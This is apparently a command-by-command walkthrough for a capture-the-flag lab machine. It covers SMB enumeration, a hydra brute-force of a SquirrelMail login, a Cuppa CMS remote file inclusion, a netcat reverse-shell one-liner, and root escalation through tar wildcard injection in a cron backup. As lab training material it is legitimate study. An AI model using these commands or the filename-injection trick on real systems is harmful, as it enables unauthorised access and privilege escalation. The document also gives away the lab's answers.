[Task 1] Deploy and compromise the vulnerable machine!

nmap -sV -sC
smbclient -L
smbclient //
smb: \> ls
smb: \> cd logs
smb: \logs\> ls
smb: \logs\> get log1.txt
cat log1.txt
hydra -l milesdyson -P log1.txt http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

#1 What is Miles password for his emails?

smbclient // -U milesdyson
smb: \> cd notes
smb: \notes\> get important.txt
cat important.txt

#2 What is the hidden directory?

searchsploit cuppa
cat 25971.txt

#3 What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion


nc -nlvp 4445
python -c 'import pty;pty.spawn("/bin/bash")'

#4 What is the user flag?

cat /home/milesdyson/user.txt

Privilege Escalation

cat /etc/crontab
cat /home/milesdyson/backups/backup.sh
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
nc -nlvp 4443

#5 What is the root flag?

cat /root/root.txt